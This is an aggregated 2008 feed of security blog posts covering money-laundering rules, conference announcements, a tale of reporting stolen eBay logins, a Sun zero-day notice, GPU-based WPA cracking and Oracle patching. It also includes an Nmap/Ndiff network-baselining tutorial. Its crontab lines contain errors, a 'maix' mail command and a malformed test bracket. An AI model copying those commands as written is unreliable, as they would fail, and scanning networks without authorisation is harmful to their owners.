Thursday, October 16, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

Belgium didn't imolement European anti moneylaundering rules [belsec] [Belgian Security Blognetwork]

Posted: 16 Oct 2008 06:52 AM CDT

The European Commission has decided to refer Belgium, Ireland, Spain and Sweden to the European Court of Justice over non-implementation of the 3rd Anti-Money Laundering Directive. The transposition deadline for the Directive was 15 December 2007.

The Third Anti-Money Laundering Directive adopted in 2005 builds on existing EU legislation and incorporates into EU law the June 2003 revision of the Forty Recommendations of the Financial Action Task Force (FATF), the international standard-setter in the fight against money laundering and terrorist financing.

The Directive tightens the EU anti-money laundering regime currently applicable to the financial sector as well as lawyers, notaries, accountants, real estate agents and casinos. The scope of the Directive is broadened also to encompass trust and company service providers as well as all providers of goods, when payments are made in cash in excess of €15.000. In addition, the Directive requires the application of the anti-money laundering tools (identification and verification of customers' identity, record keeping, training of personnel, etc.) to the fight against terrorist financing.

The Directive introduces additional requirements and safeguards for situations of higher risk (e.g. trading with correspondent banks situated outside the EU).

The latest information on infringement proceedings concerning all Member States can be found at:

Identity Management : L-Sec Event 20th november [belsec] [Belgian Security Blognetwork]

Posted: 16 Oct 2008 06:12 AM CDT

Presentations European conference on the Internet of things (RFID) 6/7 october 08 [belsec] [Belgian Security Blognetwork]

Posted: 16 Oct 2008 05:38 AM CDT

SOA security : interesting working group in UK [belsec] [Belgian Security Blognetwork]

Posted: 16 Oct 2008 05:16 AM CDT

Because in Belgium such things seem to take some time before getting started, we look wherever can find it.

SOA is not a disease (even if some security analysts will find it disrupts their security infrastructure the way a disease does) but stands for Service Oriented Architecture in which business services like databases would interact with each other immediately and give the customer an integrated response without the necessity of going to several databases and to integrate the responses himself. THis all looks very nice on paper but how can you promise the same user that all those databases that are communicating in real time with each other are all so secure that no hacker/crimecracker is hopping from one server to another. (go with the flow).

There is a working group in the UK that tries to get together some guidelines and standards, norms to effectively secure this. The industry has made this job quite difficult by making different solutions with different standards and different approaches. So an independent research seems the only way forward.

The working document is here

The wiki about SOA security is here

and yess they are more focused on UK law and US standards but if you are part of an international group, these will be the laws and standards you will have to follow anyway (as there is nothing legal or standard around here).

27 november London INternational workshop Privacy Enhancing Technologies [belsec] [Belgian Security Blognetwork]

Posted: 16 Oct 2008 05:02 AM CDT

You are invited to attend Europe's foremost independent seminar on privacy technologies in London on the 27th of November to discuss the growing success of privacy enhancing technologies (PETs) in modern society.

The aim of this year's event is to demonstrate the reality of how PETs work - to discuss the barriers that are being overcome, the barriers that remain, and to share best practice that can facilitate further successful PET implementations.

Organised by four of the UK's Knowledge Transfer Networks (KTN), A Fine Balance 2008 pushes the agenda of this international privacy debate further than ever before. A morning of presentations will include speakers across Europe including representatives from IBM Research, Microsoft EMEA, the Information Security Awareness Forum (ISAF) and the UK Department for Transport.

The afternoon will comprise a series of chaired working sessions, each focusing on different areas related to securing the success of PETs in action. They will discuss and recommend areas for development, as well as isolating examples of best practice that could increase the number of successful implementations.

Speakers and panellists include:

The Earl of Errol - House of Lords

Jan Camenisch - IBM Research

Caspar Bowden - Chief Security Officer, Microsoft EMEA

Professor Brian Collins - Chief Scientific Advisor, Department for Transport

David King - Chair of the Information Security Awareness Forum (ISAF)

Mike Hawkes - Director for Security, Mobile Data Association

Attendance, including lunch and refreshments, is £75+VAT at the early bird rate, rising to £95+VAT on 30th September.

we are interested in slides or reporting :)

London 6 & 7th november Conference about the Insider Threat [belsec] [Belgian Security Blognetwork]

Posted: 16 Oct 2008 04:53 AM CDT

'The Malicious Exploitation of Information Systems Countering the Rise of Insider Threat'

Leading speakers from Europe and the US will attend the event, which will include insights from a former fraudster on issues such as sabotage, profiling offenders and the psychology of offenders. Confirmed speakers so far include Laurence Mulley from the Serious Organised Crime Agency (SOCA); Shari Lawrence Pfleeger from the RAND Corporation; Robert Coles from Merrill Lynch; Clive Blackwell from the Information
Security Group, Royal Holloway, University of London; and Peter Sommer from the London School of Economics.

Topics covered at the conference include:
· how to conduct digital insider threat forensic investigations
· effective use of post-insider threat incident analysis
· improving security processes to avoid security threats
· detecting malicious insider threat from behaviour patterns

6th-7th November at UCL in London, please call Catherine Baker on: 0116 222 5550, or email:

Will probably interest the banking industry in these hard times.

We are interested in slides :)

The Little Black Book of Security [ - A Revolution is the Solution]

Posted: 16 Oct 2008 04:31 AM CDT

When I found this pile of EBay logins circulating around the Net, I did whatever any security person does in such a situation - ask around for "contacts at company x", so I could get them the data. However, this was going to take a good few hours so in the meantime, I could indulge in one of my favourite past-times.

See, I do have lots of security connections at different companies and people who can GET me the contacts I need, but I always make a point of going through "standard" channels first, just to remind myself what its actually like for a regular web-user who finds something that shouldn't be out there.

More often than not, it just reminds me that most methods of reporting illegal activity are fundamentally broken.

What's alarming is that if it hadn't been me - or some other security person who'd found this data...if it was some regular web-user who didn't have that support structure to fall back on...this data would probably still be lying around online for people to use and abuse as they see fit.

I won't bore you with all the details, but I started off by calling the Paypal phone number. This predictably ended in disaster, because you have to login to Paypal and be assigned a unique reference number. The operator at the other end couldn't understand that the problem had nothing to do with my own account (though he did spend about five minutes telling me all the security procedures he was going to deploy on my account to prevent any further fraud, which is nice of him if somewhat misplaced).

Later that day, I went through a procession of vaguely hopeless "support staff" on EBay Live Chat. I demanded some kind of dedicated support team EMail address due to the severity of the problem - I think it was support guy number two who gave me an email address, eventually. Hooray! A dedicated, no-nonsense address to get things sorted out.

Then I Googled it, and upon seeing the second entry down rolled my eyes. In for the long haul, baby....

I think it was the day after this (or maybe the day after that) that I tried one more time.

Dispensing with the first Live Support guy thrown in my general direction, I was put through to someone on the "Security Team". After finding out this person couldn't help me either, I was suddenly dumped into a chat with what I can only assume was the Final Boss of the Internet - or at least, the top dog, crap-we're-running-out-of-support-staff King of Live Support Security Team Guy.

The below webchat is 100% genuine, and I have screenshots to prove it (though I've removed some unnecessary text, typos and other junk). You may blink, rub your eyes and slap yourself in the face a couple of times while reading it.

This is entirely natural.

Just imagine that I'm not a security researcher - I'm a regular web user, who just found 5,000+ logins and I really, really want to get this to someone who can do something about it.

That's all.

Now watch it go horribly wrong.

3:03:27 PM System
Connected with A
3:03:32 PM A: Hello and thank you for contacting Account Security Live Help, my name is A. Please give me a moment to review what you have already typed.
3:06:33 PM A: Thank you for patiently waiting, based on what I just read, you want to report a stolen eBay account, am I correct?

3:07:19 PM Paperghost: To be accurate: five thousand, five hundred and thirty four stolen accounts

3:08:23 PM A: I see, thank you for taking the time to report this issue. I will be reviewing it shortly. For future reports you wish to make, please use our webform:


It will reduce any possible wait time in our chat sessions and also ensure that the information is sent to the correct team so they can review it in a more timely manner.

3:09:00 PM Paperghost: You want me to paste five thousand, five hundred and thirty four ebay username and passwords into a contact us form?
3:09:14 PM Paperghost: isn't there an email address that works that i can just send it to?

3:10:53 PM A: You can use the link that I just provided you and below that there is "EMAIL US" link where you can send or paste those names.
3:11:43 PM A: Please separate it with a space in between them.

3:14:14 PM Paperghost: that contact form page wants me to paste in each username one at a time - there are over five thousand usernames in a word document. that contact form has a limit of 10,000 characters. the sum total of the stolen data comprises 243,347 words including spaces. It isn't physically possible for me to send it to you via that form

3:16:49 PM A: Sorry but that is the only link for us to report an account that was taken over by unauthorized third party.

3:17:56 PM Paperghost: Well I have over five thousand stolen accounts here that need to be reported so someone is going to have to find me an email address I can send an email with a word document attached to it to

3:23:15 PM A: What I am going to do is to report all the users that you have and report it to our Trust and Safety team, if you don't mind, typing all those member's in our chat window.
3:24:26 PM A: As I check on the link that I just provide you, you can separate all those name by putting a comma on it.

3:24:38 PM Paperghost: How am I supposed to type more than five thousand usernames into a chat window? You realise most of the account owners will be retired or deceased by the time I finish typing?

3:25:55 PM A: As I check on the link that I just provide you, you can separate all those name by putting a comma on it.
3:26:10 PM A: Just copy and paste it on the username.

3:28:18 PM Paperghost: The word document I have has one username per line, and there are more than five thousand lines of text in the document. it would take me about six months non-stop typing to cut and paste each name from the document then paste it into this chat box

3:29:25 PM A: I have an alternative link for you to report those members, just copy those name and paste in on the link below:


3:31:08 PM Paperghost: That page is not going to accept five thousand lines of userdata submitted to it - and even if it did, i'm not sending all those usernames and passwords via a standard http:// page
3:31:25 PM Paperghost: you realise i could send you the whole thing via email in three seconds and bam, its done

3:32:06 PM A: That is an alternative link that connects you to our Trust and Safety team.

3:33:55 PM Paperghost: your trust and safety team must have an email address i can send this information to, this is crazy
3:37:57 PM Paperghost: what option do i pick on the drop down menu
3:38:05 PM Paperghost: as none of them are applicable as these arent my accounts
3:38:43 PM Paperghost: never mind, i tried it and it crashed my browser.

3:39:19 PM A: First drop down is misuse of eBay -> report a user.

3:42:05 PM Paperghost: as i said, unfortunately it crashes my browser. i don't think the form is designed to handle that much text

3:42:48 PM A: How about sending 100 username at a time?

3:44:12 PM Paperghost: there are FIVE THOUSAND usernames on there. do you have any idea how long that is going to take?

3:45:02 PM A: I do apologize but that is the only way.
If you want you can try sending that at

3:45:28 PM Paperghost: i've already sent it to twice. is there someone there who can check if theres a mail there from xxxxxxxxxxx

A: Yes we have a designated department that handles those mails, and once they have receive it they will immediately review before sending a respond to you.

3:48:44 PM Paperghost: Yes but can someone at least confirm its in that departments mailbox even if they don't open it up
3:49:10 PM Paperghost: I'm trying to help you reclaim five thousand stolen ebay accounts here and it doesn't seem to be going very well

3:49:40 PM A: As much as I want to help you with that, I don't have the necessary tools to check on the mailbox.

3:50:56 PM Paperghost: and nobody there is able to contact anyone from that team to check if its there?

3:52:21 PM A: Don't worry since you already forwarded an email, what we can advise is to please wait for an email confirmation in regards to the investigations.
3:53:24 PM Paperghost: Okay
3:53:45 PM A: I do understand your concern. And we thank you also for taking your time reporting those members.
3:53:49 PM Paperghost: Thanks
3:54:16 PM A: You're very much welcome and thank you for using eBay, I hope you have a great day.


As it turns out, I was (eventually) sent a reply from the EMail address I was given by one of the support people. It said:

"Dear eBay member,

Thanks for your email. We want to help resolve any problems with your
account as quickly as possible.

The fastest way for us to help you is through Live Help, where you can
have a one-on-one chat with one of our customer service agents. The chat
happens right in your web browser, so you don't need any special

Please let the chat agent know that you already sent us an email, as
that will help us speed things along.

We won't receive any replies to this email, so please contact Live Help
for further assistance."

You couldn't make it up.

Of course, all of this was kind of irrelevant - the wheels were already in motion behind the scenes, and I'd consulted the Little Black Book of Security. Because of that, the data had already been passed onto the people it needed to go to, despite the frontline support boobery, and I'd been assured it was being sorted out.

But again - if I didn't have access to that Black Book....what would have happened to this data? Would it still be sitting online for all and sundry to take what they wanted? Would I be going back into Live Chat in an endless cycle of utterly pointless attempts to get someone to do something about it?

Sad to say, but based on the evidence above - quite probably.

It's kind of amazing that such a basic thing - look, here's some fraud and I want you to fix it - can't get past the brick wall that is frontline customer support.

And also kind of depressing. No....make that alarming. Actually, make that puzzling.

No....come to think of it, make it all of the above.

And then some.

Job Opportunity of Server Architect [Telecom,Security & P2P]

Posted: 16 Oct 2008 01:50 AM CDT

There is a good job opportunity in our organization. If you are interested or have friends to recommend, please don’t hasitate to contact me by sending the CV/resume to my email address (richard.zhaol at gmail dot com)

Job Discription:

This is a senior technical position of Global Infrastructure Department, under CIO organizations. This is an individual contributor, direct report to Director of Architect and Security Operations.

1. Lead the global roadmap and technology innovations related to server, storage, virtualization.
2. Lead the design the overall architecture and standards for global server and storage
3. Communicate with global business users and collect, analyze their requirements
4. Design the solution to meet the business requirements, with support from SME (subject matter expert) from operation towers
5. Lead the design and define of technical manuals and templates used for operational enhancements and changes.


1. Bachelor  degree majored in Computer Sciences or Electrical Engineering with very good academic performances (Master/PhD a plus)
2. Minimum 10 Years working experience as IT Operation/Consulting engineer/architect, minimum 5 years IT system design experience, minimum 3 years large scale server and storage system design experience
3. Strong technical background in related fields, ie. networking, telecom and security technologies (Experience at ITIL is a plus)
4. Good communication skill. Good written/spoken English, be able to give technical talks/presentation both in English.

Links for 2008-10-15 [] [HiR Information Report]

Posted: 16 Oct 2008 12:00 AM CDT

Links for 2008-10-15 [] [Sicurezza Informatica Made in Italy]

Posted: 16 Oct 2008 12:00 AM CDT

Zero day for Sun Solstice AdminSuite (sadmind) [Security4all] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 07:19 PM CDT

A zero day disclosure is never a good thing but people need to be beware when it does. A vulnerability resides within a function of the Sun Solstice AdminSuite sadmind, which when properly exploited can lead to remote compromise of the vulnerable system. This information was posted to the Full Disclosure Mailinglist 2 days ago, together with an exploit for Metaploit.

I checked the Sun Security advisories but I couldn't find any information (yet). Disable the port or service if you don't need it or try to shield it if you do. Put an ACL in place. Keep an eye on upcoming advisories for workarounds and patches.

Related posts:
(Photo under creative commons from mag3737's photostream)

ISACA Event: The changing threat: Targeted Attacks [Security4all] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 07:09 PM CDT

ISACA Belgium is organizing a round table event about "targeted attacks" on Wednesday 29 October at 17:30. This event is free but only accessible for ISACA members.
The Topic:
The threat is always changing, adapting to our defenses. While botnets will remain a serious threat for some time to come, the next generation of attack is already in use. It has been looming just over the horizon for a while, but targeted attacks are being actively used against high value targets. These targeted attacks are a significant shift in tactics of the attackers and as such will require a shift in our protective stance.
The speakers for this session will be:
Mr. Swa Frantzen.
Swa Frantzen holds a Master in Science in Computer Engineering degree, and has worked in the IT and telecommunication sector ever since he graduated in 1990. He always kept a focus on security aspects throughout his career. Swa was involved in numerous roles during his career, ranging from system administrator to CSO. Currently he is an independent security consultant. Swa is active as one of the 35 volunteer handlers at the Internet Storm Center of SANS since 2002.

Miscellaneous: The presentation will be in English. Questions are welcome in Dutch, French and English. Dress is casual. There is no charge for this Round Table.
Notification of Attendance: Please send a mail to, if you plan on attending this RTM (indicating your membership number)!
Location: ULB Campus de la Plaine, Forum Auditorium E, 1050 Brussels
Access plan to the campus : campus/pla_F.html
Targeted attacks is a topic of great interest to me. Word exploits, Grey Pigeon and the likes comes to mind. I'm kind of disappointed that I won't be able to attend this session since I'm at RSA Europe that day.

For other interesting security events in and around Belgium, look at the security calendar on the right side of this blog. Upcoming LSEC and OWASP events have been added.

Related posts:

(Photo courtesy from

Detailed report on the Georgia Cyberwarfare incident [Security4all] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 06:47 PM CDT

A 29 page report is available for download from or This is probably the most thorough analysis available on the cyberwarfare related to Georgia.

An excerpt:
"In August 2008, cyberwar associated with the Russian Federation struck once more, this time against Georgia. The DDoS attacks began in the weeks running up to the outbreak of the Russian invasion and continued after the Kremlin announced that it had ceased hostilities on August 12th."
Related posts:
(Photo courtesy of

ROSI : Quando conviene investire in sicurezza informatica [Sicurezza Informatica Made in Italy]

Posted: 15 Oct 2008 05:36 PM CDT

Dopo un bel po di assenza causa lavoro e progetti vari torniamo all'argomento investimenti in ambito di sicurezza informatica.

Nel post precedente ho cercato di fornire un idea sugli step da seguire prima di arrivare a delineare un budget di spesa per la sicurezza informatica. Un consulente di sicurezza informatica può aiutare a definire gli obiettivi e le priorità da perseguire per non vanificare l'efficacia dei budget di spesa, che coi tempi che corrono sono sempre più ristretti.

In questo post vorrei dare il mio contributo alla discussione sul ROI e ROSI in ambito sicurezza e chiarire molti dei "misbelief" che purtroppo dominano il settore.

La prima domanda da porsi è: ha senso parlare di ROI per la sicurezza?
Se si vuole essere economisti puri, certamente no. Il ROI presuppone un Return, ricavo dall'investimento, che chiaramente non esiste per spese in favore di maggiore sicurezza e protezione.

Per chiarire ogni dubbio:
Mentre in generale il ROI presuppone un guadagno a fronte di una costo, il ROSI presuppone un risparmio a fronte di un costo.

Si affronta un investimento in sicurezza (costo) per evitare una perdita risultante da un attacco con successo agli asset aziendali. Cost avoidance. Il ROSI è positivo quando il costo è minore della perdita.

Questo stravolgimento di concetti è ciò che ha confuso molti addetti del settore e scoraggiato molti manager ancorati ai dogmi dell'economia pre-informatica.

Fin qui sembrerebbe solo un problema di cambio di mentalità per cui come nell'evoluzione della specie, chi sa adattarsi ai cambiamenti sopravvive, gli altri soccombono.

Non è così semplice purtroppo. Prima di capire perché, bisogna avere davanti agli occhi le formule coinvolte nel calcolo del ROSI:

Per singolo rischio

SLE= Single Loss Expectancy (Perdita per singolo rischio)
AV = Asset value (valore economico dell'asset da proteggere)
EF = Exposure Factor (probabilità che il rischio diventi reale)

L'investimento è il costo da sostenere per ridurre di un certo livello percentuale l'EF
connesso al rischio considerato.
Questo include la supposizione, corretta a mio parere, che nessuna spesa in termini di sicurezza
può veramente ridurre a 0 l'EF, cioè la probabilità che l'attacco si realizzi con successo.

L'investimento in sicurezza è volto a diminuire il più possibile il SLE diminuendo l'EF.

Un esempio pratico chiarisce il concetto:

Una risorsa (asset) il cui valore ammonta a 1Mln di euro, ha una probabilità di essere compromessa pari al 10% (EF).

L'ammontare a rischio, in termini monetari, è pari a 100,000 euro.
(Il 10% di 1Mln di euro).

Spendendo 50,000 euro per far scendere l'EF al 2%, avremmo in questo caso solo 20,000 euro a rischio risparmiando 80,000 euro a fronte di un investimento di 50,000 euro.
Il ROSI a questo punto è del 160% e il nostro investimento di 50,000 ha fatto scendere l'EF da 10% a 2% riducendo lo SLE.

Come si può notare dalla precedente formula i problemi del calcolo del ROSI sono molteplici:
  • Il calcolo si basa sulle probabilità che un evento accada
  • Non ci sono statistiche approfondite e affidabili sulla frequenza degli eventi e l'incidenza delle minacce
  • I costi post-disaster sono in parte deterministici e in parte aleatori (deterministici per quanto riguarda il valore dell'asset da proteggere, aleatori per quanto riguarda danni d'immagine, sanzioni connesse).

Nel precedente esempio, lo SLE include costi che fanno capo alle seguenti voci:

  • danni economici (es. business continuity)
  • sanzioni per inadempimento alle compliance/regulations (si pensi ala PCI compliance o a eventi di data breach che causano apertura di fascicoli da parte delle autorità di vigilanza per la protezione della privacy)
  • danni di immagine
  • perdita del segreto industriale (costo sostenuto per il raggiungimento degli obiettivi di progetto a vantaggio dei concorrenti)
  • altri a seconda della natura e dimensione dell'organizzazione

Alla luce delle precedenti osservazioni ha ancora senso parlare di ROSI?
Il ROSI non compare mai in documenti finanziari ma può essere utile per decidere la fattibilità e la convenienza dell'investimento in sicurezza qualunque sia la dimensione dell'organizzazione.

Chi assegna i valori nella formula dello SLE?

A dare un valore alla variabile AV è solitamente il livello esecutivo che meglio di ogni altro conosce il valore economico di ogni asset aziendale.

Una corretta gestione della variabile EF è compito esclusivo di un esperto di sicurezza che deve essere a conoscenza dello stato della sicurezza pre-investimento e deve essere in grado di valutare il livello di incidenza di ogni minaccia.

Nei prossimi post voglio espandere il concetto di ROI applicato all sicurezza informatica.
Non è vero che non si può guadagnare da un investimento in sicurezza. Alla prossima

Elections Are Done For Me [Emergent Chaos]

Posted: 15 Oct 2008 04:25 PM CDT

I Think I Voted

Forty Percent of California voters are "permanent absentee" voters. Oregon runs entirely by mail-in votes. Other US states have some sort of mail-in or absentee status that people can assign themselves to.

For those people, including me, elections are a slice of time that ends on election day. This isn't new, until relatively recently, it all worked that way. You couldn't expect everyone to all be in town on that one day. It is only urbanization that allows us to have elections be an event rather than a process. I sat down last night and waded through the whole mass of offices, measures, and initiatives. I have now completed my civic duty.

This is probably a good idea, as many of the issues with voting and counting votes and securing them have in their model that it has to be done on one day, and as quickly as possible after the polls close. It improves security and accountability to allow and encourage people to vote over an interval of a few weeks.

Asset Management Using Nmap [/dev/random] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 03:31 PM CDT

Nmap is probably the most known and used open source port scanner on the Internet. I’ll explain how to use this wonderful network toolbox to automate a simple asset management solution.

Know your network!” This is the main focus of this post. Today, having a global and up-to-date overview of network asset is mandatory for all network administrators: New devices are configured or decommissioned, untrusted devices are connected without permissions or users runs unsecured servers. Nmap can be used to build a base-line of your network components and to easily report any detected changes.

The base-line will contain all devices (IP addresses) and services available on them at a given time. By services, I mean here any new applications listening to a TCP or UDP port. Based on this baseline, we will be able to detect:

  • Newly connected or removed servers
  • Newly configured or stopped services

To detect all changes, I will use a script called “Ndiff”. This tool is available in the Nmap SVN repository. Ndiff is a project born during the 2008 Google Summer of Code. Written in Python, this tool helps in the comparison of Nmap scans. It takes two Nmap XML output files and prints the differences between them.

In the next paragraphs, I will assume that you have a running Linux machine with Nmap and Ndiff properly installed. Please, refer to the setup documentation if you have question about their installation. Note that Nmap is a wonderful tool and has plenty of options. This is not the goal to cover all Nmap features here. Please check the Nmap documentation for more information.

Defining the base line

First, we will perform a scan of our network and save the results into a XML file.

Warning: Do not scan network if you don’t have rights to! In most countries, network scanning is an illegal operation. Take care!

Let’s go with the following command:

# nmap -n -oX /root/baseline.xml

It will perform a complete scan of the whole C class and save the result in a XML file. During the scan execution, useful information will also be printed on the console.

Scheduling the daily scan

We have now an overview of our network. Let’s schedule a new network scan via a crontab entry every night (hour, week or month depending on your needs):

 0 1 * * * (touch /var/run/nmap.running; \ nmap -n -oX /root/current.xml >/dev/null; \ rm /var/run/nmap.running) 

As we do not know exactly when the scan will be finished, let’s create a lock file during the process execution (/var/run/nmap.running). A new XML file will be created with the current network status.

Generating the report

Via a second crontab entry, we use now Ndiff to generate the difference report between the base line and the current scanner results. Then, we overwrite the base line with the latest results. Notice that the presence of the lock file created above is checked to prevent the Ndiff to run if the scan process is not yet complete. The output of the cron command will be sent by e-mail to the network administrator.

0 2 * * * (while [ -f /var/run/nmap.running]; do sleep 5; done; \ ndiff /root/baseline.xml /root/current.xml | \ /bin/maix -s "Network Scan"; \ mv /root/current.xml /root/baseline.xml)

Here are example of generated reports. The first one has detected an unknow SMTP server which was successfully stopped:

 # ndiff /root/baseline.xml /root/current.xml Wed Oct 15 13:25:02 2008 -> Wed Oct 15 13:25:02 2008 ( 25/tcp is closed, was open. 

The second one shows a new detected host and its running services:

 # ndiff /root/baseline.xml /root/current.xml Wed Oct 15 13:50:15 2008 -> Wed Oct 15 21:42:29 2008 Host is up, was unknown. Add ipv4 address 22/tcp is open. 25/tcp is open. 998 tcp ports are filtered. 

What’s next?

The Nmap/Ndiff combination will help you to detect changes on your network(s). This can be helpful to deploy monitoring of newly detected services. This can also help to detect potential security breaches. However, this solution is not a vulnerability scanner (like Nessus or OpenVAS)! This is a free and reliable solution to increase your network security. Why hesitate?

Server Hardening - Getting Back To Basics [Digital Bond]

Posted: 15 Oct 2008 02:18 PM CDT

If you are responsible for defending networks and systems, you have many different tools at your disposal (unfortunately so do the attackers). There are many products on the market, from firewalls to intrusion detection/prevention systems, that aim to protect your valuable resources. There are also many host-based products, such as host-based intrusion prevention systems and anti-virus software which live directly on the host and protect your systems from harm. Don’t get me wrong, I believe that all of these defensive measures are fantastic and you must use them in a layered approach to secure your networks and systems.

However, the one defensive layer that cannot be overlooked is system hardening (This was all we had before all the fancy defensive tools). This means without third-party tools, go through your settings, permissions, and other configuration parameters, to ensure that the system is secure. I believe this has been something that, from a defensive perspective, some have overlooked or forgotten about completely. This is why I am excited to be working on the Bandolier project, which was created to develop Nessus audit files to help harden control system application components (See Jason Holcomb’s postings for more information).

To start, I’ve been going through some of the various system hardening standards and guidelines trying to find which ones work best. I’ve found several great resources in this area which I want to share, which include:

The nice part is that the commercial version of Nessus gives you access to audit files that can test your systems against all of the above standards. A great example of how the audit files actually work, and tests for a flaw that I am particularly fond of exploiting, is the Tenable blog posting on Auditing Windows 2003 Servers for Disabled USB Drives and AutoRun CD-ROM.

So what exactly does this mean? [StillSecure, After All These Years]

Posted: 15 Oct 2008 02:17 PM CDT

". . . and Cisco NAC support is extended to cover all NAC versions, protecting the network from infected guest hosts." Beats the heck out of me.  It is in the last line of F-Secure's press release about their new endpoint agent/suite (when did we get to the point that an agent and a suite are interchangeable anyhow?).  It comes right before the "about F-Secure" paragraph. Is it the proverbial catch all? Do they really support all NAC versions? All versions of Cisco NAC? How? Did they just want to hit all of the buzzwords?  They were sure to mention my boy Hoff's new buzzword, "the cloud". But show me an AV vendor who isn't checking the cloud these days.  The cloud is the new black.

Guys if you are going to mention something you do in your press release at least explain it so people know what you are talking about.  Also, why be the 15th AV vendor to announce what you do in the cloud and make it like your unique.  Why not just say, "we are doing what everyone else is doing".  Of course you could say you did it first. you do it better, yours is bigger or faster. etc. Hey I guess size does matter.  But talk about me too releases, come on.

Presentation on Optimizing Your Logging for Insider Attack Tracking [Anton Chuvakin Blog - "Security Warrior"]

Posted: 15 Oct 2008 01:11 PM CDT

OK, I [well, my blogspot scheduler, rather :-)] am releasing another fun presentation that I've been "hoarding" for a while to keep my readers "entertained" while I am enjoying Siberia.

This presentation is about using logs for tracking insiders as well as about "insider-proofing" you logs and making them more useful for that purpose.

It is also embedded below:

Logs vs Insiders
View SlideShare presentation or Upload your own. (tags: management security)


Possible related posts:

Using flashy slide transitions can kill your presentation [Security4all] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 12:28 PM CDT

So people think that they can spice up their presentation by using slide transition or animations like Boomerang, Checkerboard, Wedge, Blinds, Newsflash and lord help us, Random. But in fact, it's really annoying and it takes the focus away from the core of the presentation: YOU!

I did this exercise once. I was talking about a subject and had bullet points FLYING in, one by one. You saw the people changing their eye focus from me to the screen. Then I asked the audience about a point I just made, that wasn't in the slide. Most people admitted not having heard it. So think twice before using those animations or cheesy transitions. Keep it simple (KIS).


Previous posts:

Report Fingers Google’s Ill Gotten Gains From Illegal Typo-Squatting [Infosecurity.US]

Posted: 15 Oct 2008 11:57 AM CDT

News has surfaced (via a report authored by Harvard University Assistant Professor Ben Edelman)  of evidence pointing to apparent illegal business practices committed by third party miscreants  that are generating huge profits from typo squatting. Apparently, according to the report, Google (NasdaqGS: GOOG) then generates income based on  AdSense and AdWord services (which stands to [...]

Major Spam Operation Terminated [Infosecurity.US]

Posted: 15 Oct 2008 11:40 AM CDT

KnujOn reports the termination of a major spam operation. The United States Federal Trade Commission has terminated (hopefully with extreme prejudice…ed.) the criminal activities of ‘Herbal King’. From the FTC via KnujOn: “A U.S. district court has ordered a halt to the operations of a vast international spam network that peddled prescription drugs and bogus male-enhancement [...]

GNUCITIZEN Announces New, Online Security System [Infosecurity.US]

Posted: 15 Oct 2008 11:34 AM CDT

GNUCITIZEN has announced a new, online security system dubbed NETSECURIFY (currently in private beta). Part of their portfolio of services monikered in the same vein (as it were)  BLOGSECURIFY and WEBSECURIFY. Read an excerpt from the full post after the jump. From the post: “Netsecurify is part of GNUCITIZEN's online security toolkit including tools such as [...]

SC Magazine article on new perimeter [CTO Chronicles]

Posted: 15 Oct 2008 11:31 AM CDT

SC Magazine has a cover story up here on "The New Perimeter" that features New York City Transit's NAC deployment.  In addition to being a good plug for Mirage (which I'm never above promoting!), it also has good information on the dissolving network perimeter (a primary NAC driver), NAC market sizing and the importance of defense in depth.  Definitely worth a read.

Hackers Only Responsible for 1% of Data Breaches [/dev/random] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 09:39 AM CDT

According to a study, only one percent of data breaches are caused by hackers! On first position of data breaches causes: negligent team members!

Source: Data News.

[Chinese]俄国研究人员破解WPA2提速100倍 [Telecom,Security & P2P]

Posted: 15 Oct 2008 09:24 AM CDT

俄国公司ElcomSoft Co. Ltd研究成功使用nVidia视频卡GPU破解WPA/WPA2提速100倍。这个报道引起了很多安全人士的兴趣。



NVidia GPU Used to Crack WPA(2) Keys [/dev/random] [Belgian Security Blognetwork]

Posted: 15 Oct 2008 08:45 AM CDT

I found this article which speaks about a Russian firm which developed a tool to use NVidia GPU (up to four) to decrypt WPA or WPA2 encryption systems (bruteforce method).

Here is the product: ElcomSoft Distributed Password Recovery.

Conclusion? Wi-Fi protections are not sufficient enough to ensure confidentiality! Always use other encryption mechanisms over your Wi-Fi networks (VPN, SSL, SSH tunnels, …)

It's that day of the quarter...Patch Tuesday [ImperViews]

Posted: 15 Oct 2008 08:37 AM CDT

This quarter's "Oracle patch Tuesday" has arrived again which means that there's no better time to share (yet again) my POV on patching as a security best practice.  Or should I say "worst" practice.

I'll be using Oracle as an example not because their patching cycles are worse than other vendors. On the contrary, they have shown tremendous progress over the past 3 years with their latest improvement being the use of CVE codes to identify the individual vulnerabilities.

One of the vulnerabilities fixed in this latest CPU (CVE-2008-2625) was discovered by me and reported to Oracle in December 2005. That's almost three years ago!

Now, Oracle had their reason for not rushing into releasing a patch. First of all, it scores relatively low on the CVSS (4.0 out of 10.0) mainly because it's high complexity. Additionally, it only affects a limited set of deployment scenarios (those who use proxy accounts). Now that the patch is out, administrators need to make a decision regarding whether or not they want to apply the patch. Applying a patch is not only time consuming, it's also risky. Therefore we would expect an administrator to be able to answer the following questions in order to make an intelligeble decision:

- Is the vulnerability affecting my database server?

- Is there a work around for my specific environment?

- Is there an external measure I can take to mitigate the vulnerability until a patch is applied?

Unfortunately, in the Oracle CPU advisory it is very hard to find answers to these questions. In the case of CVE-2008-2625, there is no mention of the fact that only deployments who use PROXY accounts are affected. In the case of other vulnerabilities such as CVE-2008-3989 or CVE-2008-3992, there is no mention of a work-around (i.e. remove the vulnerable packages, restrict access to administrative users, etc.).

The amount of information supplied is so scarce that while I know that there is a PeopleSoft vulnerabiliy that I've reported to Oracle that is fixed in this patch, I cannot identify which of the five it is!  Only on one occasion did Oracle provide work-around information; this was earlier this this year when a vulnerability was disclosed on the Internet before a patch was available from Oracle.

Oracle, as I mentioned earlier, is not the only guilty vendor; in fact, IBM is even worse. Microsoft is somewhat better at providing the necessary work-around information. One of the arguments used by vendors for delaying disclosure is that too many details would allow hackers to create code that can exploit systems before they are protected. Let me tell you a secret: THEY ALREADY ARE!

Hacking is a growing business. Money is invested in creating new efficient tools. Some of these tools are aimed at reverse engineering patches (I've been told that this is illegal, but so is hacking...).  Any respectable hacker (notice the irony) owns such tools. For a savvy person using the appropriate tools, it takes days to create an exploit once the patch is out. Applying patches accross an enterprise takes (at least) much, much longer than that.

